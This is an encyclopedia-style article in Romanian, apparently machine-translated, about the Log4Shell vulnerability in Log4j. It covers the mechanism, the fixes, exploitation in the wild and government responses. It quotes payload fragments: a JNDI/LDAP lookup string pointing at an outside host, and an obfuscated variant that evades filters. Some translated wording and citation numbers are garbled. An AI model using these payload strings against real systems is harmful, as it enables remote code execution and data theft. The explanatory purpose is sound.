Log4Shell ( CVE-2021-44228 ) este o vulnerabilitate zero-day în Log4j , un cadru popular de înregistrare Java, care implică execuția de cod arbitrar. [1] [2] Vulnerabilitatea - existența sa nu a mai fost văzută din 2013 - a fost dezvăluită în mod privat de Apache Software Foundation , din care Log4j este un proiect, de Chen Zhaojun de la echipa de securitate Alibaba Cloud pe 24 noiembrie 2021 și public divulgat pe 9 decembrie 2021. [3] [4] [5] [6] Apache i-a acordat Log4Shell un scor de severitate CVSS de 10, cel mai mare rating disponibil. [7]Exploatarea se estimează că afectează sute de milioane de dispozitive și este foarte ușor de utilizat. [8] [9]
Vulnerabilitatea exploatează faptul că Log4j permite solicitări către servere LDAP și JNDI arbitrare, mai degrabă decât să valideze răspunsuri, [1] [10] [11] permițând atacatorilor să execute cod Java arbitrar pe un server sau pe altă mașină sau să transmită informații sensibile. [5] Apache Security Group a publicat o listă a proiectelor software afectate. [12] Serviciile comerciale afectate includ Amazon Web Services , [13] Cloudflare , iCloud , [14] Minecraft: Java Edition , [15] Steam , Tencent QQ și multe altele. [10] [16] [17] Potrivit Wiz și EY , vulnerabilitatea a afectat 93% din mediile cloud pentru întreprinderi. [optsprezece]
Experții au descris Log4Shell drept cea mai mare vulnerabilitate de până acum; [19] LunaSec a descris-o drept „un eșec de proiectare de proporții catastrofale”, [5] Tenable a spus că exploitul a fost „cea mai mare și cea mai critică vulnerabilitate din istorie”, [20] Ars Technica a numit-o „probabil cea mai gravă vulnerabilitate de până acum”. . [21] și The Washington Post au spus că descrierile experților în securitate „se limitează la apocalipsă”. [19]
Log4j este o bibliotecă de înregistrare open source care permite dezvoltatorilor de software să înregistreze date în aplicațiile lor. Aceste date pot include introducerea utilizatorului. [22] Este omniprezent în aplicațiile Java, în special în software-ul pentru întreprinderi. [5] Scrisă inițial în 2001 de Cheki Gulcu, acum face parte din Apache Logging Services, un proiect al Apache Software Foundation . [23] Fostul membru al Comisiei de securitate cibernetică a președintelui Barack Obama , Tom Kellermann, a descris Apache drept „unul dintre stâlpii giganți ai podului care facilitează țesutul conjunctiv dintre lumile aplicațiilor și mediul de calcul”. [24]
Java Naming and Directory Interface (JNDI) vă permite să căutați obiecte Java în timpul execuției, având în vedere calea către datele lor. JNDI poate folosi mai multe interfețe de directoare, fiecare oferind o schemă diferită de căutare a fișierelor. Printre aceste interfețe se numără Lightweight Directory Access Protocol (LDAP), un protocol non-Java [25] care preia datele obiectului sub forma unui URL de pe un server adecvat, local sau orice altul de pe Internet. [26]
În configurația implicită, când un șir este înregistrat, Log4j 2 efectuează înlocuirea șirului în expresii de forma ${prefix:name}. [26] De exemplu, Text: ${java:version}puteți converti în Text: Java version 1.7.0_67. [27] Printre expresiile recunoscute se numără ${jndi:<lookup>} ; prin specificarea unei căutări prin LDAP, un URL arbitrar poate fi interogat și încărcat ca date de obiect Java. ${jndi:ldap://example.com/file}va descărca date de la această adresă URL atunci când este conectat la internet. Prin introducerea unui șir care este înregistrat, un atacator poate descărca și executa cod rău intenționat găzduit pe o adresă URL publică. [26] Chiar dacă execuția datelor este dezactivată, un atacator poate obține date, cum ar fi variabile secrete de mediu, plasându-le într-un URL unde vor fi înlocuite și trimise la serverul atacatorului. [28] [29] În plus față de LDAP, alte protocoale de căutare JNDI potențial utile includ varianta sa sigură LDAPS, Java Remote Method Invocation (RMI), Domain Name System (DNS) și Internet Inter-ORB Protocol (IIOP). [30] [31]
Deoarece solicitările HTTP sunt adesea înregistrate, un vector de atac comun este plasarea unui șir rău intenționat în adresa URL a solicitării HTTP sau într-un antet HTTP înregistrat frecvent , cum ar fi User-Agent. Protecția timpurie includea blocarea oricăror solicitări care conțineau conținut potențial rău intenționat, cum ar fi ${jndi. [32] O căutare naivă poate fi ocolită prin obscurcarea interogării: de exemplu, ${${lower:j}ndiva fi convertită într-o căutare JNDI după efectuarea unei operații cu șir pe litera j. [33] Chiar dacă o intrare, cum ar fi un nume, nu este înregistrată imediat, aceasta poate fi înregistrată ulterior în timpul procesării interne și conținutul său poate fi executat. [26]
Remedieri pentru această vulnerabilitate au fost lansate pe 6 decembrie 2021, cu trei zile înainte ca vulnerabilitatea să fie publicată, în versiunea Log4j 2.15.0-rc1. [34] [35] [36] Remedierea a inclus limitarea serverelor și protocoalelor care pot fi utilizate pentru căutări. Cercetătorii au descoperit o eroare asociată CVE-2021-45046 care permite executarea codului local sau de la distanță în anumite configurații non-implicite și a fost remediată în versiunea 2.16.0, care a dezactivat toate caracteristicile folosind JNDI și suport pentru căutarea mesajelor. [37] [38] Pentru versiunile anterioare, clasa org.apache.logging.log4j.core.lookup. JndiLookuptrebuie eliminată din classpath pentru a atenua ambele vulnerabilități. [7] [37] Remedierea recomandată anterior pentru versiunile mai vechi a fost să setați proprietatea sistemului log4j2.formatMsgNoLookups truela , dar această modificare nu împiedică utilizarea CVE-2021-45046. [37]
Versiunile mai noi ale Java Runtime Environment (JRE) atenuează, de asemenea, această vulnerabilitate prin blocarea în mod implicit a încărcării codului de la distanță, deși alți vectori de atac încă există în unele aplicații. [1] [28] [39] [40] Au fost publicate mai multe metode și instrumente pentru a ajuta la detectarea utilizării versiunilor vulnerabile ale log4j în pachetele Java încorporate. [41]
Exploatarea permite hackerilor să preia controlul asupra dispozitivelor vulnerabile folosind Java . [8] Unii hackeri folosesc vulnerabilitatea pentru a profita de dispozitivele victimelor; inclusiv extragerea de criptomonede , crearea de rețele botnet , trimiterea de spam, crearea de uși din spate și alte activități ilegale, cum ar fi atacurile ransomware. [8] [19] [42] În zilele de după lansarea vulnerabilității , Check Point a urmărit milioane de atacuri inițiate de hackeri, unii cercetători observând peste o sută de atacuri pe minut, ducând în cele din urmă la peste 40% dintre atacuri. rețelele de afaceri supuse atacurilor internaționale. [8] [24]
Potrivit CEO-ului Cloudflare, Matthew Prince, dovezile utilizării sau testării exploatării au apărut încă de la 1 decembrie, cu nouă zile înainte ca acestea să fie dezvăluite public. [43] Potrivit firmei de securitate cibernetică GreyNoise, mai multe adrese IP au fost răzuite de site-uri web pentru a verifica dacă există servere care au vulnerabilitatea. [44] Mai multe rețele botnet au început să scaneze pentru vulnerabilitate, inclusiv botnet-ul Muhstik până pe 10 decembrie, precum și Mirai , Tsunami și XMRig. [8] [43] [45] Conti a fost văzut exploatând vulnerabilitatea pe 17 decembrie. [19]
Unele grupuri sponsorizate de stat din China și Iran au folosit și exploit-ul, potrivit Check Point, deși nu se știe dacă exploatarea a fost folosită de Israel, Rusia sau SUA înainte ca vulnerabilitatea să fie dezvăluită. [19] [46] Check Point a declarat că pe 15 decembrie 2021, hackerii susținuți de Iran au încercat să se infiltreze în afacerile israeliene și în rețelele guvernamentale. [19]
În Statele Unite , directorul Agenției de Securitate Cibernetică și Infrastructură (CISA), Jen Easterly, a descris exploit-ul drept „una dintre cele mai grave, dacă nu chiar cea mai serioasă pe care le-am văzut în întreaga mea carieră”, explicând că sute de milioane de dispozitive au fost afectate. și a recomandat ca vânzătorii să plătească prioritizarea actualizărilor de software. [8] [47] [48] Agențiile civile angajate de guvernul SUA au avut până la 24 decembrie 2021 pentru a remedia vulnerabilitățile, deși până atunci asta ar fi permis accesul la sute de mii de ținte. [19]
Centrul canadian pentru securitate cibernetică (CCCS) a cerut organizațiilor să ia măsuri imediate. [49] Agenția Canadiană de Venituri și-a dezactivat temporar serviciile online după ce a aflat despre exploit, în timp ce guvernul Quebec a închis aproape 4.000 de site-uri web ca o „măsură preventivă”. [cincizeci]
Oficiul Federal de Securitate German ( Bundesamt für Sicherheit in der Informationstechnik) (BSI) a identificat exploatarea ca fiind la cel mai înalt nivel de amenințare, numind-o „situație periculoasă extrem de critică” (tradus). El a mai spus că mai multe atacuri au avut deja succes și că amploarea vulnerabilității este încă dificil de evaluat. [51] [52] Centrul Național Olandez de Securitate Cibernetică (NCSC) a început o listă permanentă de aplicații vulnerabile. [53] [54]
Ministerul Industriei și Tehnologiei Informației din China a suspendat Alibaba Cloud ca partener de analiză a amenințărilor de securitate cibernetică timp de șase luni, după ce nu a raportat mai întâi vulnerabilitatea guvernului. [55]
Un studiu realizat de Wiz și EY [18] a constatat că 93% din mediul de întreprindere cloud era vulnerabil la Log4Shell. 7% dintre sarcinile vulnerabile sunt disponibile online și fac obiectul unor încercări extinse de exploatare. Potrivit studiului, la zece zile după publicarea vulnerabilității (20 decembrie 2021), doar 45% din sarcinile de lucru afectate au fost corectate în medie în mediile cloud. Datele din cloud de la Amazon, Google și Microsoft au fost afectate de Log4Shell. [19]
Compania de HR și HR UKG, una dintre cele mai mari companii din industrie, a fost lovită de un atac ransomware care afectează marile companii. [21] [56] UKG a declarat că nu are nicio dovadă că Log4Shell a fost folosit în incident, deși analistul Allan Liska de la compania de securitate cibernetică Recorded Future a spus că ar putea exista o conexiune. [57]
Pe măsură ce companiile mai mari au început să lanseze patch-uri pentru exploatare, riscul pentru întreprinderile mici a crescut, deoarece hackerii s-au concentrat pe ținte mai vulnerabile. [42]
Dispozitivele personale, cum ar fi televizoarele inteligente și camerele de securitate conectate la internet, au fost vulnerabile la exploatare. [19]
Începând cu 14 decembrie 2021, aproape jumătate din toate rețelele corporative din lume au fost investigate activ și peste 60 de variante de exploatare au fost create într-o zi. [58] Check Point Software Technologies, într-o analiză detaliată, a descris situația ca „o adevărată pandemie cibernetică” și a descris potențialul de daune ca fiind „incalculabil”. [59] Câteva dintre recomandările inițiale au supraestimat numărul de pachete vulnerabile, ducând la rezultate false pozitive. În special, pachetul „log4j api” a fost marcat ca vulnerabil, în timp ce, de fapt, investigațiile ulterioare au arătat că doar pachetul principal „log4j-core” era vulnerabil.
Acest lucru a fost confirmat atât în ramura de lansare inițială [60] , cât și de către cercetătorii externi de securitate.
Revista de tehnologie Wired a scris că, în ciuda „hype-ului” anterioară din jurul numeroaselor vulnerabilități, „hype-ul din jurul vulnerabilității Log4j... este justificat din mai multe motive”. [46] Revista explică că omniprezența log4j, a cărui vulnerabilitate este greu de detectat de către potențialele ținte, și ușurința cu care codul poate fi transferat pe mașina unei victime au creat „o combinație de seriozitate, accesibilitate și prevalență care i-a șocat pe profesioniștii din securitate. ." [46] Wired a prezentat schematic și secvența utilizării Log4Shell de către hackeri: grupurile miniere de criptomonede vor fi primele care exploatează vulnerabilitatea, apoi comercianții de date vor vinde „capul de pod” infractorilor cibernetici, care în cele din urmă se vor angaja în extorcare, spionaj și distrugere de date. . [46]
Amit Göran, CEO al Tenable și director fondator al Grupului de pregătire pentru urgențe în computere din SUA , a declarat „[Log4Shell] este de departe cea mai mare și cea mai critică vulnerabilitate din istorie”, menționând că atacurile sofisticate au început la scurt timp după eroare, afirmând: „De asemenea, noi Am văzut deja că este folosit pentru atacuri ransomware, care, din nou, ar trebui să fie un semnal de alarmă major... Am văzut, de asemenea, rapoarte despre atacatori care folosesc Log4Shell pentru a distruge sisteme fără a încerca măcar să obțină o răscumpărare - un comportament destul de neobișnuit." . [46] Sean Gallagher, cercetător senior în domeniul amenințărilor Sophos , a spus: „Ca să fiu sincer, cea mai mare amenințare aici este că oamenii au obținut deja acces și doar îl folosesc și, chiar dacă remediați problema, cineva este deja online... există atâta timp cât Internetul”. [douăzeci]
| Atacurile hackerilor din anii 2020 | |
|---|---|
| Cele mai mari atacuri | |
| Grupuri și comunități de hackeri |
|
| Au detectat vulnerabilități critice |
|
| Virușii informatici | |
| anii 2000 • anii 2010 • anii 2020 | |